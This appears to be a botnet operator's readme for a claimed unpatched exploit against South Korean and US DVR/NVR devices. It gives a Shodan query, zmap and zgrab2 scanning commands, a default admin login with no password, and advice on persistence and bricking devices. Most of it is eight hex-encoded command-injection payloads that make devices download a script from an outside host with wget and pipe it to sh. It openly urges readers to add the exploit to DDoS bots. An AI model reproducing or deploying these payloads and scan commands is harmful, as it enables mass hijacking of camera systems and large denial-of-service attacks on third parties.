https://www.shodan.io/search?query=title%3A%22CMS+Web+Viewer%22
90k hosts for http daemon 

this is the 1tbps 0day (not created by tuffy aka texas boy, created and founded by zonehax and zonesec)
these are south kr and us commercial dvr/nvr that are easily 20-40mbps call it 22mbps avgerage 80k vuln
update payloads in the main.cpp using the payload creator in python that we have provided
these devices are spread across port 8000 - 9999
brick, rep scan do anything send this to everyone!
throw it in a bot too if you want
run your botkiller and whatever you want
rm -rf /etc/init.d and reboot for device to be clean
bot kill /bin/busybox and cmdline /cmslite he will brick your bots if you dont kill!!!!.
compile and run with cat list | ./magic

if your payload is less than 31 bytes put semicolon

create payloads with python payload.py "wget http://1.1.1.1/rebt -O-|sh"
create payloads with python payload.py "wget http://1.2.3.4/f -O-|sh;"
create payloads with python payload.py "ps;"
create payloads with python payload.py "reboot;"

payloads will look like this:

const char *payloads[8] = 
{
    "\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00\x62\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x73\x64\x6f\x2e\x67\x61\x2f\x66\x72\x65\x20\x2d\x4f\x2d\x7c\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00",
    "\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00\x69\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x73\x64\x6f\x2e\x67\x61\x2f\x66\x72\x65\x20\x2d\x4f\x2d\x7c\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00",
    "\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x73\x64\x6f\x2e\x67\x61\x2f\x66\x72\x65\x20\x2d\x4f\x2d\x7c\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00",
    "\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00\x52\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x73\x64\x6f\x2e\x67\x61\x2f\x66\x72\x65\x20\x2d\x4f\x2d\x7c\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00",
    "\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00\x44\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x73\x64\x6f\x2e\x67\x61\x2f\x66\x72\x65\x20\x2d\x4f\x2d\x7c\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00",
    "\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00\x67\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x73\x64\x6f\x2e\x67\x61\x2f\x66\x72\x65\x20\x2d\x4f\x2d\x7c\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00",
    "\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00\x43\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x73\x64\x6f\x2e\x67\x61\x2f\x66\x72\x65\x20\x2d\x4f\x2d\x7c\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00",
    "\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00\x4D\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x73\x64\x6f\x2e\x67\x61\x2f\x66\x72\x65\x20\x2d\x4f\x2d\x7c\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00",
};

copy and paste them in main.cpp

these are south kr and us commercial dvr/nvr that are easily 20-40mbps call it 22mbps avg 
they the daemon i attack defaults to port 8000/tcp
the default cred (there is only one user account) is admin: (no pass) (if you wanna watch any of the 50-80k dvrs)
they have r/w system drive so persistence is as easy are you make it to be by injecting commands into /etc/init.d/
when i started my research into them i was finding about 70-80k hosts on 8000 alone now its at about 50-55k (the loading method crashes the daemon for some not the whole device so manual reboot is needed)
so if given enough time if you where to find 60-70k in the result you'd get upwards of 50-60k on net without issue
note for the zgrab scan it is sending a very small payload to check for the specific daemon
lowering the "senders" or increasing the "timeout" will help with the number you will find
zmap -p 8000 -w magic.lst -o magic_syn -T 8 --ignore-invalid-hosts
./zgrab2 banner -f i.txt -p 8000 -o 8000.json --read-limit-per-host=1 --senders=10000 --probe="\x5a\xa5\x01\x20\x00\x00\x00\x00" --timeout=4
# no need to filter like a retard (dont even use zgrab dummy)
./zgrab2 banner -f magic -p 8000 -o 8000.json --probe="\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00\x62\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x73\x64\x6f\x2e\x67\x61\x2f\x66\x72\x65\x20\x2d\x4f\x2d\x7c\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00"
./zgrab2 banner -f magic -p 8000 -o 8000.json --probe="\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00\x69\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x73\x64\x6f\x2e\x67\x61\x2f\x66\x72\x65\x20\x2d\x4f\x2d\x7c\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00"
./zgrab2 banner -f magic -p 8000 -o 8000.json --probe="\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x73\x64\x6f\x2e\x67\x61\x2f\x66\x72\x65\x20\x2d\x4f\x2d\x7c\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00"
./zgrab2 banner -f magic -p 8000 -o 8000.json --probe="\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00\x52\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x73\x64\x6f\x2e\x67\x61\x2f\x66\x72\x65\x20\x2d\x4f\x2d\x7c\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00"
./zgrab2 banner -f magic -p 8000 -o 8000.json --probe="\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00\x44\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x73\x64\x6f\x2e\x67\x61\x2f\x66\x72\x65\x20\x2d\x4f\x2d\x7c\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00"
./zgrab2 banner -f magic -p 8000 -o 8000.json --probe="\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00\x67\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x73\x64\x6f\x2e\x67\x61\x2f\x66\x72\x65\x20\x2d\x4f\x2d\x7c\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00"
./zgrab2 banner -f magic -p 8000 -o 8000.json --probe="\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00\x43\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x73\x64\x6f\x2e\x67\x61\x2f\x66\x72\x65\x20\x2d\x4f\x2d\x7c\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00"
./zgrab2 banner -f magic -p 8000 -o 8000.json --probe="\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00\x4D\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x73\x64\x6f\x2e\x67\x61\x2f\x66\x72\x65\x20\x2d\x4f\x2d\x7c\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00"
